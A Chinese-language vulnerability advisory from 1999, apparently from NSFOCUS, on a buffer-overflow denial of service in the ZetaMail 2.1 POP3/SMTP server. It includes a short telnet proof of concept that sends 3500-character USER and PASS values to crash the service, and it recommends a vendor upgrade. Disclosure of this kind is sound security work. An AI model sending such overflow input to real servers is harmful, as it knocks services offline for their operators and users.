首页 -> 安全研究

安全研究

安全漏洞
ZetaMail 2.1 Mail POP3/SMTP Server的拒绝服务问题

发布日期:1999-11-22
更新日期:1999-11-22

受影响系统:
ZetaMail 2.1 Mail POP3/SMTP Server
描述:
UssrLabs 发现了ZetaMail 2.1 Mail POP3/SMTP Server,本地/远程的拒绝服务问题,
如果使用3500字节的用户名/口令,将产生缓存溢出问题。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is ''^]''.
+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER {buffer)
+OK Send password
PASS {buffer)

Overflow Crashh.

Where (buffer) is 3500 characters.




建议:
安装这个厂家的其它版本程序
MsgCore/95 2.11,MsgCore/NT 2.10


浏览次数:9541
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障